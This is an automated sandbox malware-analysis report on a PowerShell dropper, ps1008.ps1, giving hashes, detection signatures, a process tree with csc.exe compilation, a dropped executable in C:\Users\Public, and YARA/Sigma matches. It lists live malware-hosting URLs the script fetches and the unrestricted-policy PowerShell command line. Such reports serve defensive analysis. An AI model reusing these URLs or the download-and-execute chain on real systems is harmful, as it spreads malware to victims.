Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ps1008.ps1

Overview

General Information

Sample name:ps1008.ps1
Analysis ID:1560749
MD5:54e842d329c2946cc0cf528af06f1a86
SHA1:4d0478ebcbcbb2f50964e64d3f1c748902434f93
SHA256:d006ed068aa21cbe7e34f6a2431da12e069529a53908cb965c0798c9fd9a98de
Tags:malwareps1user-Joker
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 5280 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 6548 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2CC0.tmp" "c:\Users\user\AppData\Local\Temp\xtxy3idj\CSCB2373C2DB48C49F0A0BD39442F2F8C98.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6404JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 6404INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x146d52f:$b2: ::FromBase64String(
    • 0x146d5af:$b2: ::FromBase64String(
    • 0x146db20:$b2: ::FromBase64String(
    • 0x53812d:$s1: -join
    • 0x539781:$s1: -join
    • 0x146da58:$s1: -join
    • 0x154c708:$s1: -join
    • 0x15597dd:$s1: -join
    • 0x155cbaf:$s1: -join
    • 0x155d261:$s1: -join
    • 0x155ed52:$s1: -join
    • 0x1560f58:$s1: -join
    • 0x156177f:$s1: -join
    • 0x1561fef:$s1: -join
    • 0x156272a:$s1: -join
    • 0x156275c:$s1: -join
    • 0x15627a4:$s1: -join
    • 0x15627c3:$s1: -join
    • 0x1563013:$s1: -join
    • 0x156318f:$s1: -join
    • 0x1563207:$s1: -join

    System Summary

    barindex
    Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6404, TargetFilename: C:\Users\Public\509.exe
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1", ProcessId: 6404, ProcessName: powershell.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6404, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline", ProcessId: 5280, ProcessName: csc.exe
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6404, TargetFilename: C:\Users\Public\509.exe
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6404, TargetFilename: C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1", ProcessId: 6404, ProcessName: powershell.exe

    Data Obfuscation

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6404, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline", ProcessId: 5280, ProcessName: csc.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ps1008.ps1Avira: detected
    Source: http://yourmother4cancer.infoAvira URL Cloud: Label: malware
    Source: http://bemnyc.com/u8erijeqAvira URL Cloud: Label: malware
    Source: http://fenett2018.comAvira URL Cloud: Label: malware
    Source: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23Avira URL Cloud: Label: malware
    Source: http://eastend.jp/bl5kfaAvira URL Cloud: Label: malware
    Source: http://eastend.jpAvira URL Cloud: Label: malware
    Source: http://fenett2018.com/dobgxAvira URL Cloud: Label: malware
    Source: http://abakus-biuro.net//a9zqemmAvira URL Cloud: Label: malware
    Source: ps1008.ps1ReversingLabs: Detection: 63%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
    Source: Binary string: e.pdb source: powershell.exe, 00000000.00000002.3592895893.0000014B576D2000.00000004.00000020.00020000.00000000.sdmp
    Source: global trafficHTTP traffic detected: GET /bl5kfa HTTP/1.1Host: eastend.jpConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /u8erijeq HTTP/1.1Host: bemnyc.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
    Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /bl5kfa HTTP/1.1Host: eastend.jpConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /u8erijeq HTTP/1.1Host: bemnyc.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: habarimoto24.com
    Source: global trafficDNS traffic detected: DNS query: fenett2018.com
    Source: global trafficDNS traffic detected: DNS query: eastend.jp
    Source: global trafficDNS traffic detected: DNS query: bemnyc.com
    Source: global trafficDNS traffic detected: DNS query: abakus-biuro.net
    Source: global trafficDNS traffic detected: DNS query: yourmother4cancer.info
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 08:22:30 GMTContent-Type: text/htmlContent-Length: 2814Connection: keep-aliveVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:28:06 GMTETag: "afe-6014d2fcf5ab8"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://abakus-biuro.net
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmp, ps1008.ps1String found in binary or memory: http://abakus-biuro.net//a9zqemm
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://abakus-biuro.net//a9zqemmh
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bemnyc.com
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmp, ps1008.ps1String found in binary or memory: http://bemnyc.com/u8erijeq
    Source: powershell.exe, 00000000.00000002.3596642981.0000014B57A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
    Source: powershell.exe, 00000000.00000002.3596642981.0000014B57A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.0
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eastend.jp
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmp, ps1008.ps1String found in binary or memory: http://eastend.jp/bl5kfa
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fenett2018.com
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmp, ps1008.ps1String found in binary or memory: http://fenett2018.com/dobgx
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B415D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://habarimoto24.com
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmp, ps1008.ps1String found in binary or memory: http://habarimoto24.com/nh
    Source: powershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F4A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000000.00000002.3596642981.0000014B57A90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3597009536.0000014B57AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
    Source: powershell.exe, 00000000.00000002.3596642981.0000014B57A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yourmother4cancer.info
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F4A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B415D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000000.00000002.3504639343.0000014B4F50F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://status.squarespace.com

    System Summary

    barindex
    Source: Process Memory Space: powershell.exe PID: 6404, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848DE5F780_2_00007FF848DE5F78
    Source: Process Memory Space: powershell.exe PID: 6404, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal96.expl.evad.winPS1@7/14@6/2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\509.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fr2a0bqf.0sl.ps1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: ps1008.ps1ReversingLabs: Detection: 63%
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2CC0.tmp" "c:\Users\user\AppData\Local\Temp\xtxy3idj\CSCB2373C2DB48C49F0A0BD39442F2F8C98.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2CC0.tmp" "c:\Users\user\AppData\Local\Temp\xtxy3idj\CSCB2373C2DB48C49F0A0BD39442F2F8C98.TMP"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
